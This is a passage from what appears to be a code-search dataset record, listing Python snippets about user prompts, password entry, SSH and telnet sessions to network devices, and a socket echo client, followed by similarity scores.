input(\"{} \")'.format(prompt))\n self._vim.command('call inputrestore()')\n response = self._vim.eval('user_input')\n self._vim.command('unlet user_input')\n return response", "def prompt(self):\r\n super().prompt_number()\r\n self.email = str(input(\"Email: \"))", "def get_prompt(self, timeout=30):\n #self.tc.expect(self.tool_prompt, timeout=timeout)\n #self.tf = self.tc.after.split()\n #return {'status': int(self.tf[self.tool_status_index]), 'output': self.tc.before}\n output = \"\"\n # Loop until we receive the special spt prompt while in pipe mode.\n while True:\n line = self.tc.stdout.readline()\n if re.search(self.tool_prompt, line):\n self.tf = line.split()\n break\n elif not len(line):\n # We've reached EOF or spt exited abnormally, usually a core dump!\n raise RuntimeError\n else:\n output += line\n #if self._debug:\n # print('Response: {0}'.format(self.tf))\n # print('Output: {0}'.format(output), end=None)\n #import pdb; pdb.set_trace()\n return {'status': int(self.tf[self.tool_status_index]), 'output': output}", "def reply_request(question: str, reply_options = ['y', 'yes', 'n', 'no'], show_reply = False):\n\n reply = None \n while not reply in reply_options:\n reply = input(question).lower()\n else:\n if show_reply:\n print(f'Your choice: {reply}')\n \n if reply in ['yes', 'no']:\n return reply[0]\n else:\n return reply", "def new_prompt(self, prompt):\n self._input_state = 'readline'\n ConsoleWidget.new_prompt(self, prompt)\n i = self.current_prompt_line\n self._markers[i] = self.MarkerAdd(i, _INPUT_MARKER)", "def process_ask_configs(config):\n\n if config.confluence_ask_user:\n print('(request to accept username from interactive session)')\n print(' Instance: ' + config.confluence_server_url)\n\n default_user = config.confluence_server_user\n u_str = ''\n if default_user:\n u_str = ' [{}]'.format(default_user)\n\n target_user = compat.input(' User{}: '.format(u_str)) or default_user\n if not target_user:\n raise ConfluenceConfigurationError('no user provided')\n\n config.confluence_server_user = target_user\n\n if config.confluence_ask_password:\n print('(request to accept password from interactive session)')\n if not config.confluence_ask_user:\n print(' Instance: ' + config.confluence_server_url)\n print(' User: ' + 
config.confluence_server_user)\n sys.stdout.write(' Password: ')\n sys.stdout.flush()\n config.confluence_server_pass = util.getpass2('')\n if not config.confluence_server_pass:\n raise ConfluenceConfigurationError('no password provided')", "def test_strip_no_prompt():\n string = \"\"\"MyRouter version 1.25.9\nadditional text\"\"\"\n connection = FakeBaseConnection(RESPONSE_RETURN=\"\\n\", base_prompt=\"myhostname>\")\n result = connection.strip_prompt(string)\n assert result == string", "def establish_connection(self):\r\n\r\n #creates SSH connection and adds SSH key to .known_hosts\r\n self.ssh_conn = paramiko.SSHClient()\r\n self.ssh_conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n\r\n try:\r\n self.ssh_conn.connect(**self.conn_parm)\r\n print \"Connected to %s\" % self.conn_parm['hostname']\r\n #testing: self.ssh_conn.close()\r\n except socket.error:\r\n print \"Connection Failed on device %s\" % self.conn_parm['hostname']\r\n\r\n #find prompt\r\n open_session = self.ssh_conn.invoke_shell()\r\n output = open_session.recv(1000)\r\n\r\n #testing: print output\r\n\r\n #go into Enable-Mode if not already in it\r\n if '#' not in output:\r\n open_session.send('enable\\n')\r\n time.sleep(1)\r\n open_session.send(self.password)\r\n open_session.send('\\n')\r\n else:\r\n print \"In Enable-Mode\"\r\n\r\n #turn off paging\r\n open_session.send('terminal length 0\\n')\r\n time.sleep(3)\r\n \r\n return open_session", "def ask(self):\n subprocess.run([\"say\", \"-v\", \"Kyoko\", str(self.answer)])", "def __init__(self, node):\n # _session will hold the underlying pexpect session handle\n self._session = None\n self.alias = node[\"alias\"]\n self.ip = node[\"ip\"]\n self.password = node[\"password\"]\n self.port = node[\"port\"]\n self.connection_type = node[\"connection\"]\n self.info = node # Store the raw testbed information\n self.promptuser = r\"[\\r\\n][^\\r\\n]* # \"\n self.promptshell = r\"\\[(root|admin)\\@[\\.a-zA-Z0-9-]+ [\\~]+\\]\\# \"\n\t\n self.prompts = {\n \"user\" : re.compile(self.promptuser),\n CLI_MODES.shell : re.compile(self.promptshell),\n }\n self.promptmore = re.compile(r\"lines \\d+-\\d+\")\n self._mode = None\n self._mode_stack = []\n self.connect()", "def prompt_for_credentials(realm, uri, user, password):\n\n try:\n if realm is None:\n realm = raw_input('Realm: ')\n if uri is None:\n uri = raw_input('URI: ')\n if user is None:\n user = raw_input('Username: ')\n if password is None:\n password = getpass.getpass()\n\n return realm, uri, user, password\n except KeyboardInterrupt:\n print\n return None, None, None, None", "def test_prompt_msg_newline_withask_fails(self):\n self.expected['failed'] = True\n self.expected['msg'] = \"Option 'newline' is not compatible with option 'ask'.\"\n\n self.assertEquals(\n self.prompt._prompt(self.response, {\n \"ask\": \"test_var\",\n \"newline\": False\n }),\n self.expected\n )", "def prompt_selection(self,\r\n prompt_text: str,\r\n validate: Union[Callable[[str], Optional[Any]], partial],\r\n default: Any) -> Any:\r\n while True:\r\n try:\r\n if self.__use_standard_console:\r\n user_input = prompt(prompt_text)\r\n else:\r\n user_input = self.__alt_prompt(prompt_text)\r\n except KeyboardInterrupt:\r\n return default\r\n if user_input == '':\r\n return default\r\n user_input = validate(user_input)\r\n if user_input is not None:\r\n break\r\n return user_input", "def echo_client(host, port):\n # Create a TCP/IP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Connect the socket to the server\n 
server_address = (host, port)\n print \"Connecting to %s port %s\" % server_address\n sock.connect(server_address)\n\n while True:\n # Send data\n try:\n # Send data\n # message = raw_input()\n # print \"Sending %s\" % message\n # sock.sendall(message)\n # # Look for the response\n message = raw_input('\\ncontinue receive data? [Y / N]')\n sendata = raw_input('send something?\\n')\n if sendata is not None:\n sock.sendall(sendata)\n if message == 'N' or message == 'n':\n break\n \n data = sock.recv(1024)\n sock.sendall('reply:'+data)\n print(\"Received: %s\" ) % data\n except socket.errno, e:\n print \"Socket error: %s\" %str(e)\n except Exception, e:\n print \"Other exception: %s\" %str(e)\n # finally:\n # print \"Closing connection to the server\"\n # # sock.close()\n print('end connection\\n')\n sock.close()", "def client_leaving(self, telnet_connection):", "def _password_prompt(question: str, console: io.IO) -> str:\n console.tell(question)\n while True:\n password1 = console.getpass('Password: ')\n try:\n _password_validate(password1)\n except ValueError as e:\n console.error(e)\n continue\n password2 = console.getpass('Password (again): ')\n if password1 != password2:\n console.error('Passwords do not match, please try again')\n continue\n return password1", "def TerminalClientStart(self):\n pass", "def interactive(self, handle_message=None, context=None):\n if context is None:\n context = {}\n\n history = InMemoryHistory()\n while True:\n try:\n message = prompt(INTERACTIVE_PROMPT, history=history, mouse_support=True).rstrip()\n except (KeyboardInterrupt, EOFError):\n return\n if handle_message is None:\n print(self.message(message, context))\n else:\n print(handle_message(self.message(message, context)))", "def _prompt(prompt):\n return raw_input(\"%s [yes or no]: \" % prompt) == \"yes\"", "def connect(self, cmd, window, **kwargs):\n try:\n kwargs['server']\n except KeyError:\n window.server_event('/%s syntax: /%s servername [port] [nickname]' % cmd)\n return\n try:\n kwargs['port']\n try: \n int(kwargs['port'])\n except ValueError:\n raise KeyError\n except KeyError:\n kwargs['port'] = 6667\n try:\n kwargs['nickname']\n except KeyError:\n kwargs['nickname'] = \"circe\"\n self.connection.connect(**kwargs)", "def __window_prompt(self, text):\n return True", "def _prompt(letters='yn', default=None):\n\n import sys\n while True:\n try:\n inputstr = sys.stdin.readline().strip()\n except KeyboardInterrupt:\n sys.exit(0)\n if inputstr and inputstr in letters:\n return inputstr\n if default is not None and inputstr == '':\n return default\n print 'Come again?'", "def do_ospfd(self, line):\n try:\n self.fibbing[line].call('telnet', 'localhost', '2604')\n except KeyError:\n log.error('Unknown node %s', line)", "def interact(self):\n if not self.connected(): return\n\n try:\n if sys.platform == 'win32':\n import msvcrt\n else:\n import tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n tty.setraw(fd)\n\n self.start_listener()\n self.start_anti_idle_timer()\n\n sys.stdout.write(self.prompt)\n\n pre_ch = b''\n while True:\n if sys.platform == 'win32':\n ch = msvcrt.getch()\n if ch == b'\\xe0':\n ch = b'\\x1b'\n if pre_ch == b'\\x1b':\n if ch == b'K': ch = b'[D' # left arrow\n elif ch == b'M': ch = b'[C' # right arrow\n elif ch == b'H': ch = b'[A' # up arrow\n elif ch == b'P': ch = b'[B' # down arrow\n else:\n ch = sys.stdin.read(1)\n if not ch:\n break\n if not self.connected():\n break\n\n self.write(ch)\n pre_ch = ch\n\n if not self.connected():\n break\n 
finally:\n if sys.platform != 'win32':\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n self.cancel_anti_idle_timer()", "def copeWithInput(self, s):\n \n if self.debug > 5:\n CPL.log('TCCShell.copeWithInput', \"Nub %s read: %r, with buf=%r\" % (self.name, s, self.inputBuffer))\n\n while 1:\n # Connections to the TCC's tccuser captive account return lines\n # terminated by CRLF, but with the LF coming at the start of the \"next\n # line\". Odd, and to be investigated. In the meanwhile, strip leading LFs\n #\n if len(self.inputBuffer) > 0 and self.inputBuffer[0] == '\\n':\n self.inputBuffer = self.inputBuffer[1:]\n \n reply, leftover = self.decoder.decode(self.inputBuffer, s)\n s = None\n if self.debug > 5:\n CPL.log('TCCShell.copeWithInput', \"decoded: %s, yielding buf=%r\" % (reply, leftover))\n\n self.inputBuffer = leftover\n if not reply:\n break\n\n if self.log:\n try:\n txt = reply['RawText']\n except:\n txt = \"UNKNOWN INPUT\"\n self.log.log(txt, note='<')\n \n # Here's the special TCC bit: search for YourUserNum, \n if self.cid == None:\n newCID = self.findUserNum(reply['KVs'])\n if newCID != None:\n self.cid = newCID\n CPL.log('TCCShell.copeWithInput', \"setting CID=%s\" % (self.cid))\n self.connected()\n \n cmd = self.getCmdForReply(reply)\n r = Hub.Reply.Reply(cmd, reply['flag'], reply['KVs'])\n cmd.reply(r)" ]
[ "0.7024742", "0.67167115", "0.6706943", "0.65913546", "0.65091944", "0.645665", "0.62801105", "0.6189571", "0.61475736", "0.61325663", "0.60985357", "0.6096203", "0.6044156", "0.60315806", "0.60073096", "0.5959323", "0.5922411", "0.5920338", "0.5898053", "0.58856004", "0.58762634", "0.5848668", "0.58410114", "0.5833611", "0.58323646", "0.5800465", "0.57781124", "0.57568985", "0.5735574", "0.57206225", "0.56912935", "0.5672307", "0.5654508", "0.56540775", "0.56457525", "0.5624936", "0.56232643", "0.56024045", "0.5585292", "0.5563288", "0.55442834", "0.5534573", "0.5522905", "0.5518056", "0.55178267", "0.54953665", "0.5490357", "0.5489801", "0.5487323", "0.54811746", "0.547752", "0.54629546", "0.5435956", "0.5433821", "0.54317856", "0.542376", "0.54232526", "0.5410668", "0.5397383", "0.5397383", "0.5396413", "0.53749007", "0.5373544", "0.53695154", "0.5358311", "0.53104377", "0.5293652", "0.5292779", "0.52803916", "0.52784777", "0.5259668", "0.5247011", "0.5246572", "0.5243747", "0.5242254", "0.52316326", "0.5219219", "0.521689", "0.5216288", "0.52117217", "0.52113163", "0.52024156", "0.51961935", "0.51823205", "0.5177129", "0.5175851", "0.5164744", "0.51629525", "0.51615876", "0.51612467", "0.51582956", "0.51511025", "0.51479274", "0.5144471", "0.5141685", "0.513971", "0.5123366", "0.51168084", "0.51100945", "0.5099052", "0.5096546" ]
0.0
-1
Python function for importing the MNIST data set. It returns an iterator of 2-tuples with the first element being the label and the second element being a numpy.uint8 2D array of pixel data for the given image.
def read(dataset = "training", path = "."): if dataset is "training": fname_img = os.path.join(path, 'train-images-idx3-ubyte') fname_lbl = os.path.join(path, 'train-labels-idx1-ubyte') elif dataset is "testing": fname_img = os.path.join(path, 't10k-images-idx3-ubyte') fname_lbl = os.path.join(path, 't10k-labels-idx1-ubyte') else: raise ValueError, "dataset must be 'testing' or 'training'" # Load everything in some numpy arrays with open(fname_lbl, 'rb') as flbl: magic, num = struct.unpack(">II", flbl.read(8)) lbl = np.fromfile(flbl, dtype=np.int8) with open(fname_img, 'rb') as fimg: magic, num, rows, cols = struct.unpack(">IIII", fimg.read(16)) img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols) get_img = lambda idx: (lbl[idx], img[idx]) # Create an iterator which returns each image in turn for i in xrange(len(lbl)): yield get_img(i)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def readmnist(dataset = \"training\", path = \".\"):\n\n if dataset is \"training\":\n fname_img = os.path.join(path, 'train-images.idx3-ubyte')\n fname_lbl = os.path.join(path, 'train-labels.idx1-ubyte')\n elif dataset is \"testing\":\n fname_img = os.path.join(path, 't10k-images.idx3-ubyte')\n fname_lbl = os.path.join(path, 't10k-labels.idx1-ubyte')\n # else:\n # raise ValueError, \"dataset must be 'testing' or 'training'\"\n\n # Load everything in some numpy arrays\n with open(fname_lbl, 'rb') as flbl:\n magic, num = struct.unpack(\">II\", flbl.read(8))\n lbl = np.fromfile(flbl, dtype=np.int8)\n\n with open(fname_img, 'rb') as fimg:\n magic, num, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)\n\n get_img = lambda idx: (lbl[idx], img[idx])\n\n # Create an iterator which returns each image in turn\n for i in xrange(len(lbl)):\n yield get_img(i)", "def train_data() -> Iterator[Tuple[Label, ChanneledImage]]:\n return zip(*get_data(TRAIN_FILES, 60000))", "def readMNISTData():\n mnist = input_data.read_data_sets(\"MNIST_data\",one_hot=True) \n return mnist", "def mnist(path):\n with open(path, 'r') as f:\n for line in f:\n data = line.strip().split(',')\n\n # Label is a vector with one element per class\n label = [0.0] * 10\n label[int(data[0])] = 1.0 \n\n # The data are images of 28x28 pixels\n image_array = np.asfarray(data[1:]).reshape((28, 28))\n # Normalize the pictures \n image_array = image_array / 255.0\n\n #plt.imshow(image_array, cmap='Greys', interpolation='None')\n yield (image_array, label)", "def test_data() -> Iterator[Tuple[Label, ChanneledImage]]:\n return zip(*get_data(TEST_FILES, 10000))", "def load_mnist(dataset=\"training\", digits=np.arange(10), path=\".\"):\n\n if dataset == \"training\":\n fname_img = os.path.join(path, 'train-images-idx3-ubyte')\n fname_lbl = os.path.join(path, 'train-labels-idx1-ubyte')\n elif dataset == \"testing\":\n fname_img = os.path.join(path, 't10k-images-idx3-ubyte')\n fname_lbl = os.path.join(path, 't10k-labels-idx1-ubyte')\n else:\n raise ValueError(\"dataset must be 'testing' or 'training'\")\n\n flbl = open(fname_lbl, 'rb')\n magic_nr, size = struct.unpack(\">II\", flbl.read(8))\n lbl = pyarray(\"b\", flbl.read())\n flbl.close()\n\n fimg = open(fname_img, 'rb')\n magic_nr, size, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n img = pyarray(\"B\", fimg.read())\n fimg.close()\n\n ind = [ k for k in range(size) if lbl[k] in digits ]\n N = len(ind)\n\n images = zeros((N, rows, cols), dtype=uint8)\n labels = zeros((N, 1), dtype=int8)\n for i in range(len(ind)):\n images[i] = array(img[ ind[i]*rows*cols : (ind[i]+1)*rows*cols ]).reshape((rows, cols))\n labels[i] = lbl[ind[i]]\n\n return images, labels", "def as_mnist(filename, imwidth):\n\n images = []\n labels = []\n \n if filename.find(\"devel\") != -1:\n print(\"we're working with the development set: \" + filename)\n\n for cls, data in enumerate(load(filename)):\n for example in data:\n labels.append(cls)\n image = numpy.zeros(shape=(imwidth, imwidth), dtype='uint8')\n for (x, y) in example:\n x_ = int(round(imwidth * x))\n y_ = int(round(1-(imwidth * y)))\n image[y_, x_] = 255\n images.append(image.flatten())\n\n return numpy.vstack(images).T.copy(), numpy.array(labels)", "def mnist(path):\n with open(path, 'r') as f:\n for line in f:\n data = line.strip().split(',')\n\n # Label is a vector with one element per class\n label = [0.01] * 10\n label[int(data[0])] = 0.99\n\n # The data are images of 28x28 
pixels\n #image_array = np.asfarray(data[1:]).reshape((28, 28))\n image_array = np.asfarray(data[1:])\n # Normalize all values between [0.01, 1.0]\n image_array = ((image_array) / 255.0 * 0.99) + 0.01\n\n #plt.imshow(image_array, cmap='Greys', interpolation='None')\n yield (image_array, label)", "def MNIST_data():\n\n # Pobieramy macierze numpy z cyframi\n # images[i,j,k] <=> piksel (j,k) z i-tego obrazka w zbiorze danych\n images, labels = get_MNIST_dataset(range(10), \"training\") #pierwszy argument to\n\n # a) Ilosc przykladow i rozmiary danych\n print \"Raw training data dimensions \", images.shape\n print \"Labels dimensions \",labels.shape\n\n # b) Ile jest cyfr 2?\n print \"Counting 2 in training dataset \",len(filter(lambda x: x == 2, labels))\n\n # c) Jaki jest sredni obrazek 2 ? (Usrednienie wszystkich macierzy ktore sa 2)\n\n #1. Pobierzmy wszystkie dwojki, fajny sposob indeksowania\n print labels == 2\n only_2 = images[labels == 2, :, :]\n print \"Checking number of 2s \", only_2.shape\n\n #2. TODO: Usrednienie (matrix.mean moze byc przydatne)\n\n #3. TODO: narysowanie usrednionej cyfry (zobacz pl.imshow)\n\n # d) Ostatnie - przetworzmy ostatnia cyfre do 1 wymiarowego wektora\n vectorized = np.reshape(images[-1], newshape=(images[-1].shape[0]*images[-1].shape[1]))\n print \"Vectorized last digit \", vectorized", "def extract_images(f):\n\tprint('Extracting', f.name)\n\twith gzip.GzipFile(fileobj=f) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2051:\n\t\t\traise ValueError('Invalid magic number %d in MNIST image file: %s' %\n\t\t\t\t\t\t\t\t\t\t\t (magic, f.name))\n\t\tnum_images = _read32(bytestream)\n\t\trows = _read32(bytestream)\n\t\tcols = _read32(bytestream)\n\t\tbuf = bytestream.read(rows * cols * num_images)\n\t\tdata = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tdata = data.reshape(num_images, rows, cols, 1)\n\t\treturn data", "def _extract_images(self, filename):\n log.info('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = self._read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = self._read32(bytestream)\n rows = self._read32(bytestream)\n cols = self._read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def load_data():\n\n \"\"\"The ``training_data`` is returned as a tuple with two entries.\n The first entry contains the actual training images. This is a\n numpy ndarray with 50,000 entries. Each entry is, in turn, a\n numpy ndarray with 784 values, representing the 28 * 28 = 784\n pixels in a single MNIST image.\"\"\"\n\n \"\"\"The second entry in the ``training_data`` tuple is a numpy ndarray\n containing 50,000 entries. 
Those entries are just the digit\n values (0...9) for the corresponding images contained in the first\n entry of the tuple.\"\"\"\n\n \"\"\"The ``validation_data`` and ``test_data`` are similar, except\n each contains only 10,000 images.\"\"\"\n f = gzip.open('MNIST/data/mnist.pkl.gz', 'rb')\n training_data, validation_data, test_data = Pickle.load(f, encoding='bytes'\n )\n f.close()\n return (training_data, validation_data, test_data)", "def load_mnist(path, kind='train'):\n '''ref: http://yann.lecun.com/exdb/mnist/ '''\n ''' each hand write is 28x28 = 784, a 1 dim vector'''\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte'\n % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte'\n % kind)\n\n # check the offical doc to know how to extract the content\n '''\n [offset] [type] [value] [description]\n 0000 32 bit integer 0x00000801(2049) magic number (MSB first)\n 0004 32 bit integer 60000 number of items\n 0008 unsigned byte ?? label\n 0009 unsigned byte ?? label\n ........\n xxxx unsigned byte ?? label\n The labels values are 0 to 9.\n '''\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8)\n\n '''\n [offset] [type] [value] [description]\n 0000 32 bit integer 0x00000803(2051) magic number\n 0004 32 bit integer 60000 number of images\n 0008 32 bit integer 28 number of rows\n 0012 32 bit integer 28 number of columns\n 0016 unsigned byte ?? pixel\n 0017 unsigned byte ?? pixel\n ........\n xxxx unsigned byte ?? pixel\n Pixels are organized row-wise. Pixel values are 0 to 255. 0 means background (white), 255 means foreground (black).\n '''\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack(\">IIII\",\n imgpath.read(16))\n ''' each hand write is 28x28 = 784, a 1 dim vector'''\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels", "def load_mnist(kind='train'):\r\n with open('%s-labels.idx1-ubyte' % kind, 'rb') as lbpath:\r\n magic, n = struct.unpack('>II', lbpath.read(8))\r\n labels = np.fromfile(lbpath, dtype=np.uint8)\r\n\r\n with open('%s-images.idx3-ubyte' % kind, 'rb') as imgpath:\r\n magic, num, rows, cols = struct.unpack('>IIII', imgpath.read(16))\r\n images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784)\r\n\r\n return images, labels", "def import_mnist():\n\turl_mnist = \"http://deeplearning.net/data/mnist/mnist.pkl.gz\"\n\tfile_name = \"mnist.pkl.gz\"\n\twork_directory = \"mnist\"\n\tfile_path = maybe_download(url=url_mnist, file_name=file_name, work_directory=work_directory)\n\n\timport pickle\n\twith gzip.open(file_path,'rb') as ff :\n\t\tu = pickle._Unpickler( ff )\n\t\tu.encoding = 'latin1'\n\t\ttrain, val, test = u.load()\n\t\ttrainX = np.array(train[0])\n\t\ttrainY = np.reshape(train[1], [50000, 1])\n\t\tvalX = np.array(val[0])\n\t\tvalY = np.reshape(val[1], [10000, 1])\n\t\ttestX = np.array(test[0])\n\t\ttestY = np.reshape(test[1], [10000, 1])\n\t\ttrainX = np.concatenate((trainX, valX), axis = 0)\n\t\ttrainY = np.concatenate((trainY, valY), axis = 0)\n\treturn trainX, trainY, testX, testY", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %(magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n 
data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def import_minimias_dataset(data_dir: str, label_encoder) -> (np.ndarray, np.ndarray):\n # Initialise variables.\n images = list()\n labels = list()\n\n if not config.is_roi:\n # Loop over the image paths and update the data and labels lists with the pre-processed images & labels.\n print(\"Loading whole images\")\n for image_path in list(paths.list_images(data_dir)):\n images.append(preprocess_image(image_path))\n labels.append(image_path.split(os.path.sep)[-2]) # Extract label from path.\n else:\n # Use the CSV file to get the images and their labels, and crop the images around the specified ROI.\n print(\"Loading cropped ROI images\")\n images, labels = crop_roi_image(data_dir)\n\n # Convert the data and labels lists to NumPy arrays.\n images = np.array(images, dtype=\"float32\") # Convert images to a batch.\n labels = np.array(labels)\n\n # Encode labels.\n labels = encode_labels(labels, label_encoder)\n\n return images, labels", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def load_mnist(path, kind='train'):\n labels_path = os.path.join(path,'%s-labels-idx1-ubyte.gz'% kind)\n\n images_path = os.path.join(path,'%s-images-idx3-ubyte.gz'% kind)\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,offset=16).reshape(len(labels), 784)\n\n print(\"Dataset Loaded\")\n \n return images, labels", "def get_labeled_data(imagefile, labelfile):\n # Open the images with gzip in read binary mode\n images = open(imagefile, 'rb')\n labels = open(labelfile, 'rb')\n\n # Read the binary data\n # We have to get big endian unsigned int. 
So we need '>I'\n\n # Get metadata for images\n images.read(4) # skip the magic_number\n number_of_images = images.read(4)\n number_of_images = unpack('>I', number_of_images)[0]\n rows = images.read(4)\n rows = unpack('>I', rows)[0]\n cols = images.read(4)\n cols = unpack('>I', cols)[0]\n\n # Get metadata for labels\n labels.read(4) # skip the magic_number\n N = labels.read(4)\n N = unpack('>I', N)[0]\n\n if number_of_images != N:\n raise Exception('number of labels did not match the number of images')\n\n # Get the data\n X = np.zeros((N, rows * cols), dtype=np.uint8) # Initialize numpy array\n y = np.zeros(N, dtype=np.uint8) # Initialize numpy array\n for i in range(N):\n for id in range(rows * cols):\n tmp_pixel = images.read(1) # Just a single byte\n tmp_pixel = unpack('>B', tmp_pixel)[0]\n X[i][id] = tmp_pixel\n tmp_label = labels.read(1)\n y[i] = unpack('>B', tmp_label)[0]\n return (X, y)", "def get_labeled_data(imagefile, labelfile):\n # Open the images with gzip in read binary mode\n images = open(imagefile, 'rb')\n labels = open(labelfile, 'rb')\n\n # Read the binary data\n # We have to get big endian unsigned int. So we need '>I'\n\n # Get metadata for images\n images.read(4) # skip the magic_number\n number_of_images = images.read(4)\n number_of_images = unpack('>I', number_of_images)[0]\n rows = images.read(4)\n rows = unpack('>I', rows)[0]\n cols = images.read(4)\n cols = unpack('>I', cols)[0]\n\n # Get metadata for labels\n labels.read(4) # skip the magic_number\n N = labels.read(4)\n N = unpack('>I', N)[0]\n\n if number_of_images != N:\n raise Exception('number of labels did not match the number of images')\n\n # Get the data\n X = np.zeros((N, rows * cols), dtype=np.uint8) # Initialize numpy array\n y = np.zeros(N, dtype=np.uint8) # Initialize numpy array\n for i in range(N):\n for id in range(rows * cols):\n tmp_pixel = images.read(1) # Just a single byte\n tmp_pixel = unpack('>B', tmp_pixel)[0]\n X[i][id] = tmp_pixel\n tmp_label = labels.read(1)\n y[i] = unpack('>B', tmp_label)[0]\n return (X, y)", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def extract_images(f):\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def mnist_training():\n mndata = MNIST(MNIST_PATH)\n train_ims, train_labels = mndata.load_training()\n train_X = np.array(train_ims).T\n train_y = np.array(train_labels).T\n return train_X, train_y", "def load_fashion_mnist():\n # List of image file names\n dataset_directory = os.path.join(root_directory,'Fashion_MNIST')\n filenames = os.listdir(dataset_directory)\n filenames.sort()\n\n # List of numpy array; each row is a Image of the dataset\n data = []\n\n # Numpy array of labels associated to each class of image\n target = 
np.empty([len(filenames), ])\n\n previous_label = ''\n class_num = -1\n index = 0\n\n for index, filename in enumerate(filenames):\n data.append(Bitmap(io.imread(os.path.join(dataset_directory, filename))))\n file_label = filename.split('-')[0]\n\n if(previous_label != file_label):\n previous_label = file_label\n class_num += 1\n target[index] = class_num\n else:\n target[index] = class_num\n\n return {'bitmaps': data, 'targets': target}", "def load_MNIST_data():\n mnist = input_data.read_data_sets('data', one_hot=True)\n return {'train': mnist.train.images,\n 'validation': mnist.validation.images,\n 'test': mnist.test.images}", "def extract_images(filename):\n\tprint('Extracting', filename)\n\twith gzip.open(filename) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2051:\n\t\t\traise ValueError('Invalid magic number %d in MNIST image file: %s' %(magic, filename))\n\t\tnum_images = _read32(bytestream)\n\t\trows = _read32(bytestream)\n\t\tcols = _read32(bytestream)\n\t\tbuf = bytestream.read(rows * cols * num_images)\n\t\tdata = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tdata = data.reshape(num_images, rows, cols, 1)\n\t\treturn data", "def extract_images(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = _read32(bytestream)[0]\n rows = _read32(bytestream)[0]\n cols = _read32(bytestream)[0]\n #print('check', magic, num_images, rows, cols, rows * cols * num_images)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def unpack_data(imagefile, labelfile):\n\t# Open the images with gzip in read binary mode\n\timages = open(imagefile, 'rb')\n\tlabels = open(labelfile, 'rb')\n\t# Read the binary data\n\t# We have to get big endian unsigned int. 
